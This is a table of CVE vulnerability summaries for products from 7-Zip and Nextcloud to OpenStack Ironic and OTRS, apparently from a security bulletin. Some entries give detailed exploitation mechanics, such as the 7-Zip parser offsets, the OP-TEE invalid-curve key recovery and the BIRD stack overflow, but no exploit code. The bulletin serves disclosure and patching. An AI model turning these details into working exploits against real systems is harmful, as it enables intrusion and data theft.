| mcmilk--7-Zip | 7-Zip is a file archiver with a high compression ratio. Versions 9.34 through 26.00 contain a heap memory disclosure via SquashFS fragment offset integer overflow on 32-bit builds. 32-bit integer overflow in the SquashFS ReadBlock function allows an attacker-controlled node.Offset value to bypass the fragment bounds check, causing memcpy to read heap memory preceding the cache buffer into the extracted file. The vulnerability is exploitable only on 32-bit builds of 7-Zip where size_t is 32 bits, allowing the addition offsetInBlock + blockSize to wrap modulo 2³². On 64-bit builds the addition is promoted to 64 bits and the check correctly rejects the input. Version 26.01 patches the issue. | 2026-06-05 | 4.3 | CVE-2026-48092 |
| mcmilk--7-Zip | 7-Zip is a file archiver with a high compression ratio. Versions 9.34 through 26.00 contain an off-by-one heap out-of-bounds read in the WIM (Windows Imaging) archive handler's security descriptor lookup. In CHandler::GetSecurity (CPP/7zip/Archive/Wim/WimHandler.cpp), the per-image SecurOffsets table holds numEntries + 1 cumulative offsets, but the check securityId >= SecurOffsets.Size() admits securityId == numEntries, and the function then reads SecurOffsets[securityId + 1], fetching one UInt32 past the end of the heap-allocated CRecordVector (which performs no bounds checking on operator[]). The securityId is attacker-controlled at offset +0xC of any directory entry in WIM metadata, and the handler is registered for .wim, .swm, .esd, and .ppkg and enabled by default in stock 7z.dll; the OOB triggers zero-click in the GUI because 7zFM.exe's ListView calls GetRawProp(kpidNtSecure) for every item during listing (ASan-confirmed), and is also reachable via CLI listing with 7zz l -slt. Impact is limited to denial of service under hardened allocators and minor information disclosure, since the OOB value is only consumed arithmetically as a length and is not surfaced to the attacker; there is no write primitive. | 2026-06-05 | 4.3 | CVE-2026-48103 |
| mcmilk--7-Zip | 7-Zip is a file archiver with a high compression ratio. Versions 9.18 through 26.00 contain an uninitialized heap read in the SquashFS archive handler caused by a sparsely populated index array. In the SquashFS handler, _blockToNode is allocated with capacity for every metadata block but populated only when an inode crosses a block boundary, so a crafted image with few inodes spanning many blocks leaves most slots holding raw heap contents (the underlying allocator does not zero-initialize POD storage). When OpenDir looks up an attacker-influenced blockIndex (derived from the RootInode superblock field), it reads two of these uninitialized slots and passes them as the left/right bounds of a binary search over _nodesPos, which dereferences the midpoint without bounds checking; if the resulting value happens to match the search key, the returned index is used to read a full node struct from _nodes whose fields feed further directory parsing, forming a chained OOB read primitive that is heap-layout-dependent and not reliably triggerable. The SquashFS handler is enabled by default in stock 7z.dll and the issue triggers during Open() with no interaction beyond opening the file; impact is denial of service from wild-pointer dereference and potential heap information disclosure, with no write primitive. Version 26.01 fixes the issue. | 2026-06-05 | 4.2 | CVE-2026-48104 |
| mcmilk--7-Zip | 7-Zip is a file archiver with a high compression ratio. Versions 9.21 through 26.00 contain an off-by-one out-of-bounds read vulnerability in the ParseDepedencyExpression function of the UEFI firmware image parser (CPP/7zip/Archive/UefiHandler.cpp). The function validates an attacker-controlled opcode byte using > instead of >= against the element count of the 10-entry kExpressionCommands static array, allowing an opcode value of 10 to read one pointer slot (8 bytes on x64) past the end of the array in .rodata. The out-of-bounds value is then dereferenced as a const char * and passed through strlen and memcpy into the archive's Characts property, which may cause either a denial of service (access violation when the adjacent bytes do not form a valid readable pointer) or a minor information disclosure of an adjacent .rdata string literal into archive metadata. The vulnerability is reached automatically during IInArchive::Open() via the call path OpenFv/OpenCapsule → ParseVolume → ParseSections when processing a SECTION_DXE_DEPEX (0x13) or SECTION_PEI_DEPEX (0x1B) section whose first body byte is 0x0A, and the UEFI handler is enabled by default in stock 7z.dll with signature-based detection for both UEFIc and UEFIf formats. The outcome (crash vs. silent leak) is deterministic per build but linker-layout dependent, with no write primitive and no disclosure of heap data, secrets, or ASLR base addresses. Version 26.01 fixes the issue. | 2026-06-05 | 4.3 | CVE-2026-48111 |
| Metasoft--MetaCRM | A security vulnerability has been detected in Metasoft 美特软件 MetaCRM 6.4.0. The impacted element is an unknown function of the file develop/systparam/softlogo/upload.jsp. Such manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-01 | 6.3 | CVE-2026-10205 |
| Microsoft--Copilot Chat (Microsoft Edge) | Improper neutralization of special elements in output used by a downstream component ('injection') in Copilot Chat (Microsoft Edge) allows an unauthorized attacker to disclose information over a network. | 2026-06-04 | 6.5 | CVE-2026-47644 |
| Microsoft--Microsoft 365 Copilot | Improper neutralization of special elements used in a command ('command injection') in M365 Copilot allows an unauthorized attacker to disclose information over a network. | 2026-06-04 | 6.5 | CVE-2026-42824 |
| Microsoft--Microsoft Graph | Exposure of sensitive information to an unauthorized actor in Microsoft Graph allows an authorized attacker to disclose information over a network. | 2026-06-04 | 6.5 | CVE-2026-47655 |
| milvus-io--milvus | A vulnerability has been found in milvus-io milvus up to 2.6.13. This vulnerability affects unknown code of the file internal/metastore/kv/rootcoord/kv_catalog.go of the component Grantee ID Hash Handler. The manipulation leads to use of weak hash. The attack needs to be performed locally. The attack's complexity is rated as high. It is stated that the exploitability is difficult. The exploit has been disclosed to the public and may be used. The identifier of the patch is 3d932f1c3e065351c4440c27abe1e6479752544d. Applying a patch is the recommended action to fix this issue. | 2026-06-04 | 4.5 | CVE-2026-10814 |
| Mimecast--Incydr | In Mimecast Incydr before 2.6.0, arbitrary file access can occur. | 2026-06-05 | 4.5 | CVE-2026-50590 |
| mjperpinosa--stumasy | A vulnerability was found in mjperpinosa stumasy. The affected element is an unknown function of the file application/PHP/objects/updates/add_post.php. Performing a manipulation of the argument up_file_to_post results in unrestricted upload. The attack may be initiated remotely. The exploit has been made public and could be used. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-04 | 6.3 | CVE-2026-10806 |
| mjperpinosa--stumasy | A vulnerability was determined in mjperpinosa stumasy. The impacted element is an unknown function of the file application/PHP/objects/profiles/change_profile_image.php. Executing a manipulation of the argument pr_profile_image can lead to unrestricted upload. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-04 | 6.3 | CVE-2026-10807 |
| morgan--morgan | Impact: The morgan logging middleware's :remote-user token extracts the Basic auth username from the Authorization request header and writes it to the log stream without neutralizing control characters. An unauthenticated attacker can send a crafted Authorization Basic header containing CR or LF bytes to inject forged log lines, breaking the one-request-per-line structure of access logs and enabling log forgery against downstream log consumers. The built-in combined, common, default, and short formats are affected, as well as any custom format that references :remote-user. Affected versions: morgan 1.2.0 through 1.10.1. Patches: upgrade to morgan 1.11.0, which neutralizes control characters in the :remote-user token output. Workarounds: use a custom format string that does not include :remote-user. | 2026-06-03 | 5.3 | CVE-2026-5078 |
| mr_mat--Remove meta boxes per user role | The Remove meta boxes per user role plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.01. This is due to missing or incorrect nonce validation on the 'remove-meta-boxes-per-user-role' page. This makes it possible for unauthenticated attackers to modify or reset the plugin's per-role meta box visibility settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-06-02 | 4.3 | CVE-2026-8422 |
| myCred--myCred | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in myCred allows Stored XSS. This issue affects myCred: from n/a through 3.0.4. | 2026-06-01 | 6.5 | CVE-2026-42676 |
| NamelessMC--Nameless | NamelessMC is website software for Minecraft servers. In versions 2.2.4 and prior, the OAuth callback handling does not validate the state parameter server-side before exchanging the authorization code. This allows an attacker to capture a valid OAuth callback URL for their own account and cause a victim's browser to navigate to it, resulting in the victim's session being authenticated as the attacker-linked account (OAuth login CSRF / session swapping). This is patched in version 2.2.5. | 2026-06-02 | 5.4 | CVE-2026-34460 |
| NamelessMC--Nameless | NamelessMC is website software for Minecraft servers. A Reflected Cross-Site Scripting (XSS) vulnerability was discovered in version 2.2.4 in the id parameter of the endpoint `/index.php?route=/queries/user/`. The application reflects user-supplied input from the id parameter into the HTML response without proper sanitization or output encoding. An attacker can craft a malicious URL containing JavaScript code. When a victim visits the crafted URL, the injected script executes in the victim's browser within the context of the vulnerable application. This could allow attackers to execute arbitrary JavaScript, potentially leading to session hijacking, phishing attacks, or manipulation of page content. Version 2.2.5 fixes the issue. | 2026-06-02 | 4.3 | CVE-2026-32250 |
| NAVTOR--NavBox | NAVTOR NavBox through version 4.16.1.20 contains hard-coded credentials within its Windows Communication Foundation (SOAP) implementation. If the SOAP functionality is enabled, a local attacker can extract credentials to bypass the intended transfer workflow. Successful authentication against the SOAP interface grants access to privileged WCF methods, enabling an attacker to write or overwrite files within application-defined paths. | 2026-06-04 | 6.3 | CVE-2026-21404 |
| nesquena--Hermes WebUI | Hermes WebUI prior to v0.51.221 contains a path traversal vulnerability that allows attackers to escape the workspace boundary by supplying symlinks that resolve to files or directories outside the designated workspace root. Attackers can exploit the workspace file and listing APIs, which resolve symlink targets without enforcing that the final path remains within the workspace, to read external host files accessible to the server process and disclose sensitive data such as SSH keys, cloud credentials, or application tokens. | 2026-06-04 | 6.5 | CVE-2026-11322 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. In Nextcloud Server from versions 32.0.0 to before 32.0.9, and 33.0.0 to before 33.0.3, when a malicious user has access to a file share of a user, they could use this share token to also access the chunking upload directly and see temporary part files during ongoing uploads. It is recommended that the Nextcloud Server is upgraded to 32.0.9 or 33.0.3. It is recommended that the Nextcloud Enterprise Server is upgraded to 26.0.13.26, 27.1.11.25, 28.0.14.17, 29.0.16.16, 30.0.17.9, 31.0.14.5, 32.0.9 or 33.0.3. | 2026-06-01 | 6.3 | CVE-2026-45157 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. Prior to version 5.2.6, a missing permissions check allowed users to request reading form submissions of other users. This issue has been patched in version 5.2.6. | 2026-06-01 | 6.5 | CVE-2026-45267 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. Prior to version 2.7.2, a privilege escalation vulnerability exists in the Approval app that allows a user without sharing permissions to force the system to share a file with approvers. This results in an authorization bypass and privilege escalation, allowing unauthorized distribution of restricted files. This issue has been patched in version 2.7.2. | 2026-06-01 | 6.5 | CVE-2026-45275 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. In Nextcloud Server from versions 32.0.0 to before 32.0.9, and 33.0.0 to before 33.0.3, an authenticated attacker can access attachments of link shares when knowing the share token, circumventing password protection or download restrictions. It is applicable to any file that is shared directly, as the attacker only needs to know a documentId they own, apart from the mentioned share token. For shared folders the attacker has to know or guess a documentId of a file that is included inside the folder, making it much harder to exploit. The attacker can only extract attachments, not the shared file or folder itself. It is recommended that the Nextcloud Server is upgraded to 33.0.3 or 32.0.9. It is recommended that the Nextcloud Enterprise Server is upgraded to 33.0.3, 32.0.9, 31.0.14.5, 30.0.17.9, 29.0.16.16, 28.0.14.17 or 27.1.11.5. | 2026-06-01 | 6.5 | CVE-2026-45282 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. In Nextcloud Server from versions 32.0.0 to before 32.0.2, and 33.0.0 to before 33.0.1, the files_lock app did not properly validate the ownership of files when processing DAV lock and unlock requests. An authenticated user could lock or unlock files belonging to other users by targeting their absolute WebDAV paths. Additionally, lock tokens were disclosed to unauthorized callers in error responses, allowing attackers to remove token-based locks placed by other users' client applications. It is recommended that the Nextcloud Server is upgraded to 32.0.2 or 33.0.1. It is recommended that the Nextcloud Enterprise Server is upgraded to 31.0.14.4, 32.0.2 or 33.0.1. | 2026-06-01 | 6.3 | CVE-2026-45283 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. From versions 32.0.0 to before 32.0.9, and 33.0.0 to before 33.0.3, when a user shares a folder or file with a Nextcloud Team that includes an external member (a person added via email address who does not have a Nextcloud account), the system automatically creates a public link for that external member. This public link is not displayed in the share section of the folder, so the folder owner has no knowledge of its existence. It is sent via email to the external member. It grants the same permissions (read, write, delete, reshare, download) as the Team's access. An attacker who receives or intercepts this link can access, modify, delete, reshare, and download all data in the shared folder without any further authentication. The folder owner cannot see or revoke the link through the normal sharing interface. This issue has been patched in versions 32.0.9 and 33.0.3. | 2026-06-01 | 6.4 | CVE-2026-45285 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. In Nextcloud Server from versions 31.0.0 to before 31.0.12, and 32.0.0 to before 32.0.3, a missing check of a relation allowed authenticated users with access to any file comment to read the content of all comments. It is recommended that the Nextcloud Server is upgraded to 31.0.12 or 32.0.3. It is recommended that the Nextcloud Enterprise Server is upgraded to 21.0.9.20, 22.2.10.35, 23.0.12.31, 24.0.12.30, 25.0.13.25, 26.0.13.22, 27.1.11.22, 28.0.14.13, 29.0.16.10, 30.0.17.5, 31.0.12 or 32.0.3. | 2026-06-01 | 6.8 | CVE-2026-45810 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. From version 4.3.0 to before version 5.2.7, a removed collaborator retains unauthorized read access to uploaded respondent files for the affected form. The scope is limited to uploaded files for forms where that user previously had results access. This issue has been patched in version 5.2.7. | 2026-06-01 | 5.3 | CVE-2026-45543 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. In Nextcloud Server from versions 32.0.0 to before 32.0.9, and 33.0.0 to before 33.0.3, an authentication bypass vulnerability allowed attackers with knowledge of a user's password to circumvent two-factor authentication (2FA) protections. When a user initiated login with valid credentials on a 2FA-enabled account, the system created a temporary session token before enforcing the second factor challenge. This token could be extracted and replayed via HTTP Basic Authentication to gain unauthorized access to authenticated endpoints. It is recommended that the Nextcloud Server is upgraded to 33.0.3 or 32.0.9. It is recommended that the Nextcloud Enterprise Server is upgraded to 33.0.3, 32.0.9, 31.0.14.5, 30.0.17.9 or 29.0.16.16. | 2026-06-01 | 5.9 | CVE-2026-45690 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. In Nextcloud Server from versions 32.0.0 to before 32.0.9, and 33.0.0 to before 33.0.3, a pre-2FA session cookie (created after successful password authentication but before TOTP completion) could be reused as a Bearer token to authenticate against DAV endpoints, granting read/write access and bypassing mandatory two-factor authentication. It is recommended that the Nextcloud Server is upgraded to 33.0.3 or 32.0.9. It is recommended that the Nextcloud Enterprise Server is upgraded to 33.0.3, 32.0.9, 31.0.14.5, 30.0.17.9 or 29.0.16.16. | 2026-06-01 | 5.9 | CVE-2026-45691 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. From version 33.0.0 to before version 33.1.0, after unlocking a locked Android phone the back-button could be used to bypass the Nextcloud Files app PIN. This issue has been patched in version 33.1.0. | 2026-06-01 | 4.6 | CVE-2026-45153 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. From versions 17.0.0 to before 17.0.15, 18.0.0 to before 18.1.12, 19.0.0 to before 19.1.16, 20.0.0 to before 20.1.11, and 21.0.0 to before 21.0.4, a user with READ and CREATE permission, but no UPDATE permission for a team folder can rename files in the team folder. This issue has been patched in versions 17.0.15, 18.1.12, 19.1.16, 20.1.11, and 21.0.4. | 2026-06-01 | 4.3 | CVE-2026-45264 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. In Nextcloud Server from versions 31.0.0 to before 31.0.14, and 32.0.0 to before 32.0.4, if {lang} is used in the template directory config value, non-admin users can in some cases copy arbitrary files (depending on unix permissions) into their own Nextcloud directory via a path traversal. It is recommended that the Nextcloud Server is upgraded to 32.0.4 or 31.0.14. It is recommended that the Nextcloud Enterprise Server is upgraded to 32.0.4, 31.0.14, 30.0.17.7, 29.0.17.12 or 28.0.14.15. | 2026-06-01 | 4.4 | CVE-2026-45279 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. From version 1.3.6 to before version 8.4.0, an improper check allowed users that were provided by LDAP to still authenticate towards user OIDC after they were deleted. This issue has been patched in version 8.4.0. | 2026-06-01 | 4.6 | CVE-2026-45284 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. From versions 5.5.13 to before 5.5.17, and 6.2.0 to before 6.2.3, an authenticated user can enumerate users on the same Nextcloud instance by using the Calendar app's endpoint for suggesting attendees. The sharing restrictions, applied to other endpoints, were not effective here. This issue has been patched in versions 5.5.17 and 6.2.3. | 2026-06-01 | 4.3 | CVE-2026-45286 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. From version 0.8.0 to before version 1.0.4, the view filter criteria are exposed to users with read-only permissions in Nextcloud Tables. This issue has been patched in versions 1.0.4 and 2.0.0. | 2026-06-01 | 4.3 | CVE-2026-45544 |
| nextendweb--Smart Slider 3 | The Smart Slider 3 plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 3.5.1.36 via the replaceHTMLImage function. This makes it possible for authenticated attackers, with administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. | 2026-06-06 | 4.9 | CVE-2026-9197 |
| nextlevelbuilder--GoClaw | A flaw has been found in nextlevelbuilder GoClaw up to 3.11.3. The impacted element is the function handleSave of the file internal/http/tts_config.go of the component RoleAdmin Gateway. This manipulation causes improper privilege management. Remote exploitation of the attack is possible. The exploit has been published and may be used. The project tagged the reported issue as bug. | 2026-06-01 | 6.3 | CVE-2026-10217 |
| nextlevelbuilder--GoClaw | A vulnerability has been found in nextlevelbuilder GoClaw up to 3.11.3. This affects the function auth of the file internal/http/evolution_handlers.go. Such manipulation leads to improper authorization. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. The project tagged the reported issue as bug. | 2026-06-01 | 5.4 | CVE-2026-10218 |
| nextlevelbuilder--GoClaw | A security vulnerability has been detected in nextlevelbuilder GoClaw up to 3.11.3. Affected by this issue is the function Import of the file internal/http/tts_config.go of the component TTS Configuration Endpoint. The manipulation leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The project tagged the reported issue as bug. | 2026-06-02 | 4.7 | CVE-2026-10583 |
| nextlevelbuilder--GoClaw | A weakness has been identified in nextlevelbuilder GoClaw up to 3.11.3. The impacted element is the function TeamTasksTool.executeComplete of the file internal/tools/team_tasks_lifecycle.go of the component Team Task Completion Handler. Executing a manipulation can lead to missing authorization. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. The project tagged the reported issue as bug. | 2026-06-02 | 4.3 | CVE-2026-10616 |
| NIC--BIRD | CZ.NIC BIRD Internet Routing Daemon through 2.19.0 contains a stack-based buffer overflow in the BGP AS_PATH mask matching implementation in nest/a-path.c. The as_path_match() function uses a fixed-size stack array of 2048 + 1 pm_pos entries, while parse_path() expands AS_PATH segments from a received BGP UPDATE without enforcing a corresponding capacity limit. When RFC 8654 BGP Extended Messages are enabled and a BIRD filter evaluates an AS path mask expression such as "bgp_path ~ [= ... =]", an established BGP peer can send a long AS_PATH containing more than 2048 expanded ASNs. This causes parse_path()/as_path_match() to write beyond the fixed stack buffer, resulting in a crash of the daemon. NOTE: reportedly, the Supplier's position is that a fix is not being prioritized because all network operators should already be rejecting routes with unusually long attributes. | 2026-06-02 | 6.3 | CVE-2026-49943 |
| NousResearch--hermes-agent | A weakness has been identified in NousResearch hermes-agent up to 2026.4.30. This affects the function _scan_memory_content of the file tools/memory_tool.py. This manipulation causes injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-01 | 6.3 | CVE-2026-10223 |
| NousResearch--hermes-agent | A vulnerability has been found in NousResearch hermes-agent up to 0.12.0. This affects the function resolve_session_by_title of the file hermes_state.py of the component resume Endpoint. Such manipulation of the argument Title leads to authorization bypass. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-07 | 6.3 | CVE-2026-11461 |
| NousResearch--hermes-agent | A security flaw has been discovered in NousResearch hermes-agent up to 2026.4.30. Affected by this issue is the function _sanitize_env_lines of the file hermes_cli/config.py. The manipulation results in injection. It is possible to launch the attack remotely. The attack requires a high level of complexity. The exploitation is known to be difficult. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-01 | 5.6 | CVE-2026-10222 |
| NousResearch--hermes-agent | A security vulnerability has been detected in NousResearch hermes-agent up to 2026.4.30. This vulnerability affects the function _handle_webhook_request of the file gateway/platforms/feishu.py of the component Webhook Endpoint. Such manipulation leads to resource consumption. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-01 | 5.3 | CVE-2026-10224 |
| NousResearch--hermes-agent | A security flaw has been discovered in NousResearch hermes-agent up to 2026.4.23. This affects the function _sync_anthropic_entry_from_credentials_file of the file agent/credential_pool.py of the component Credential Pool Synchronization. The manipulation results in improper authentication. The attack must be initiated from a local position. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-02 | 5.3 | CVE-2026-10548 |
| ntbyk--JTL-Connector for WooCommerce | The JTL-Connector for WooCommerce plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 2.4.1. This is due to missing capability checks and nonce verification on the admin_post_settings_save_woo-jtl-connector action (handled by JtlConnectorAdmin::save()) and on the wp_ajax_downloadJTLLogs and wp_ajax_clearJTLLogs AJAX actions (handled by the global downloadJTLLogs() and clearJTLLogs() functions). This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify arbitrary plugin settings, download a ZIP archive of the connector's developer log files, and delete those log files. | 2026-06-02 | 4.3 | CVE-2026-9234 |
| OP-TEE--optee_os | OP-TEE is a Trusted Execution Environment (TEE) designed as companion to a non-secure Linux kernel running on Arm; Cortex-A cores using the TrustZone technology. Prior to version 4.11.0, on many of the ECDH shared secret paths, the public key isn't verified to be a point on the correct curve. By passing approximately 30-40 crafted public keys to OP-TEE, the private key can be reconstructed by a normal world attacker. When calling TEE_DeriveKey the public key is provided with full X and Y values, but the (X, Y) point might not satisfy the `Y^2 == X^3 + aX + b mod P` math for the specific curve that is used. When those public keys aren't rejected, the attacker can select public keys such that each DeriveKey call will leak `d % r` where `d` is the private key and `r` comes from the relationship between the correct curve and the attacker selected curve. With enough leaked data the Chinese remainder theorem can be used to recover the full private key. Version 4.11.0 fixes the issue. | 2026-06-03 | 4.7 | CVE-2026-45614 |
| OP-TEE--optee_os | OP-TEE is a Trusted Execution Environment (TEE) designed as companion to a non-secure Linux kernel running on Arm; Cortex-A cores using the TrustZone technology. Starting in version 4.3.0 and prior to version 4.11.0, a type confusion vulnerability exists in OP-TEE OS when processing an FFA_MEM_SHARE request from the normal world. This only applies when OP-TEE is configured as an SPMC for S-EL0 SPs, that is, with `CFG_CORE_SEL1_SPMC=y` and `CFG_SECURE_PARTITION=y`. Version 4.11.0 fixes the issue. | 2026-06-03 | 4.4 | CVE-2026-45702 |
| open-telemetry--go.opentelemetry.io/otel/baggage | OpenTelemetry-Go is the Go implementation of OpenTelemetry. Versions 1.41.0 and 1.43.0 removed raw-length rejection, which causes `Parse` to process arbitrarily large or invalid baggage headers and log errors, enabling DoS via oversized inputs. Versions 1.42.0 and 1.44.0 fix the issue. | 2026-06-04 | 5.3 | CVE-2026-41178 |
| open-telemetry--opentelemetry-ebpf-instrumentation | OpenTelemetry eBPF Instrumentation provides eBPF instrumentation based on the OpenTelemetry standard. Prior to version 0.9.0, OBI exports raw Redis error text as the span status message. Because Redis error replies can contain attacker-controlled or sensitive values, this behavior can exfiltrate tokens, PII, or other confidential input into telemetry backends and inject untrusted text into downstream analysis systems. This issue has been patched in version 0.9.0. | 2026-06-02 | 6.5 | CVE-2026-45679 |
| open-telemetry--opentelemetry-ebpf-instrumentation | OpenTelemetry eBPF Instrumentation provides eBPF instrumentation based on the OpenTelemetry standard. Prior to version 0.9.0, OBI's replacement ELF parser trusts section offsets, counts, and string offsets from the executable file. A crafted local ELF can make OBI dereference invalid section pointers or slice past string tables, causing the agent to panic while determining the process language. This issue has been patched in version 0.9.0. | 2026-06-02 | 5.5 | CVE-2026-45676 |
| open-telemetry--opentelemetry-ebpf-instrumentation | OpenTelemetry eBPF Instrumentation provides eBPF instrumentation based on the OpenTelemetry standard. Prior to version 0.9.0, OBI replays BPF probe hits into histogram observations by looping once per recorded run count. On busy systems, the run-count delta can become very large, causing the metrics exporter to spend excessive CPU time in a tight loop every collection interval. This issue has been patched in version 0.9.0. | 2026-06-02 | 5.9 | CVE-2026-45680 |
| open-telemetry--opentelemetry-ebpf-instrumentation | OpenTelemetry eBPF Instrumentation provides eBPF instrumentation based on the OpenTelemetry standard. Prior to version 0.9.0, the per-CPU message-buffer fallback path uses a 256-byte backup buffer but preserves the original payload size, which can be up to 8KB. If a CPU mismatch occurs, OBI can read beyond the fallback buffer and leak adjacent memory into telemetry. This issue has been patched in version 0.9.0. | 2026-06-02 | 5.9 | CVE-2026-45681 |
| open-telemetry--opentelemetry-ebpf-instrumentation | OpenTelemetry eBPF Instrumentation provides eBPF instrumentation based on the OpenTelemetry standard. Prior to version 0.9.0, the custom CappedConcurrentHashMap introduced for Java TLS state tracking never removes keys from its insertion-order queue when entries are deleted. In long-running instrumented JVMs, repeated connection churn can therefore grow the queue without bound and exhaust heap memory. This issue has been patched in version 0.9.0. | 2026-06-02 | 5.1 | CVE-2026-45682 |
| open-telemetry--opentelemetry-ebpf-instrumentation | OpenTelemetry eBPF Instrumentation provides eBPF instrumentation based on the OpenTelemetry standard. From version 0.7.0 to before version 0.9.0, OBI's log enricher mishandles writev buffers by reading only the first iovec entry but using the total iov_iter.count as the copy length. When log injection is enabled, a crafted multi-segment writev call can make OBI read and overwrite memory beyond the first segment. This issue has been patched in version 0.9.0. | 2026-06-02 | 4.9 | CVE-2026-45684 |
| OpenSC--OpenSC | A flaw has been found in OpenSC up to 0.26.1. This affects the function test_kpgen_certwrite of the file src/tools/pkcs11-tool.c of the component pkcs11-tool Key Generation Module. This manipulation causes a buffer overflow. The attack can be carried out remotely. The complexity of an attack is rather high, and exploitability is indicated to be difficult. The exploit has been published and may be used. Patch name: 814f745b3b6d100295f65f1935edd33d520d33ab. It is recommended to apply a patch to fix this issue. | 2026-06-01 | 5 | CVE-2026-10275 |
| OpenStack--Ironic | OpenStack Ironic before 35.0.2 allows Boot Script Injection of an iPXE script if the attacker can set node.driver_info or node.instance_info. | 2026-06-03 | 5.8 | CVE-2026-46447 |
| OpenStack--Ironic | OpenStack Ironic before 35.0.2 allows file overwrite via directory traversal during deployment with a crafted ISO image. | 2026-06-04 | 5.9 | CVE-2026-48681 |
| OpenStack--Ironic | In OpenStack Ironic 32 before 37.0.0, an unauthenticated malicious user could submit a crafted JSON string to some endpoints on the API or JSON-RPC service and effect a service crash. | 2026-06-04 | 5.3 | CVE-2026-50589 |
| OpenStack--Ironic | OpenStack Ironic before 35.0.2 allows a malicious authenticated project admin or manager to read local files on the Ironic conductor via a pxe_template. | 2026-06-04 | 4.9 | CVE-2026-44917 |
| Orca Energy--Orca heat pump | Missing authentication and clear‑text transmission of data from the heat pumps to the control server, combined with the absence of input validation on aggregated data, can lead to stored XSS that enables theft of cookies from the pump's web control interface. Older Orca heat pump devices communicating with the Orca server over an unencrypted and unauthenticated HTTP connection on a non-secure port specifically enable an attacker to impersonate a legitimate device and inject malicious payloads. This enables the insertion of harmful code directly into the Orca user portal, potentially compromising user accounts, exposing sensitive information, and allowing further unauthorized actions within the portal. | 2026-06-01 | 6.3 | CVE-2026-25599 |
| OTRS AG--OTRS | An improper neutralization of active SVG content in OTRS or ((OTRS)) Community Edition ticket article rendering allows attackers to inject specially crafted SVG payloads via email content, leading to browser-side resource exhaustion and denial of service when affected tickets are opened by an agent or customer. The issue can be exploited without JavaScript execution and is not mitigated by the configured Content Security Policy (CSP). This issue affects OTRS 7.0.X, 8.0.X, 2023.X, 2024.X, 2025.X, and 2026.X before 2026.4.X. Please note that ((OTRS)) Community Edition 6.x and before are vulnerable. Products based on the ((OTRS)) Community Edition are also very likely to be affected. | 2026-06-01 | 6.5 | CVE-2026-48208 |
| OTRS AG--OTRS | An uncontrolled allocation of resources without limits or throttling in the e-mail handling in OTRS allows excessive allocation, which may cause the webserver to abort. This issue affects OTRS 8.0.X, 2023.X, 2024.X, 2025.X, and 2026.X before 2026.4.X. Please note that ((OTRS)) Community Edition 6.x, OTRS 7.x, and products based on the ((OTRS)) Community Edition are also very likely to be affected. | 2026-06-01 | 5.7 | CVE-2026-48187 |
| OTRS AG--OTRS | An improper Input Validation vulnerability in the OTRS Customer Backend module allows access to customer information that is restricted to other groups. Please note that the feature has to be enabled and CustomerGroupSupport has to be used to be affected. This issue affects OTRS 7.0.X, 8.0.X, 2023.X, 2024.X, 2025.X, and 2026.X before 2026.4.X. | 2026-06-01 | 5.7 | CVE-2026-48189 |
| PackageKit--PackageKit | A vulnerability has been found in PackageKit up to 1.3.5. Affected is the function g_file_test of the file src/pk-transaction.c of the component API. Such manipulation of the argument frontend-socket leads to improper authorization. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. | 2026-06-01 | 4.3 | CVE-2026-10294 |
| Paolo--GeoDirectory | Missing Authorization vulnerability in Paolo GeoDirectory allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects GeoDirectory: from n/a through 2.8.157. | 2026-06-01 | 6.5 | CVE-2026-42671 |
